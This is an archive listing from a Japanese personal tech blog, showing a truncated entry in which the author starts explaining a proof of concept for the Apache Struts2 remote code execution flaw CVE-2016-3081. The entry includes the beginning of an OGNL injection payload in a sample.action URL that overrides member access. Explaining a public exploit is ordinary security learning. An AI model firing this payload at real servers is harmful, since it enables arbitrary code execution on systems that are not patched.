てきとうなメモ

本の感想とか技術メモとか

2016-04-29から1日間の記事一覧

Apache Struts2の脆弱性(CVE-2016-3081)

Security Java Struts

JVNVU#91375252: Apache Struts2 に任意のコード実行の脆弱性ぐぐるとみつかるPOCで1番簡単そうなのを解説してみる http://www.example.com/sample.action?method:%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%2C%23test%3D%23context.get%…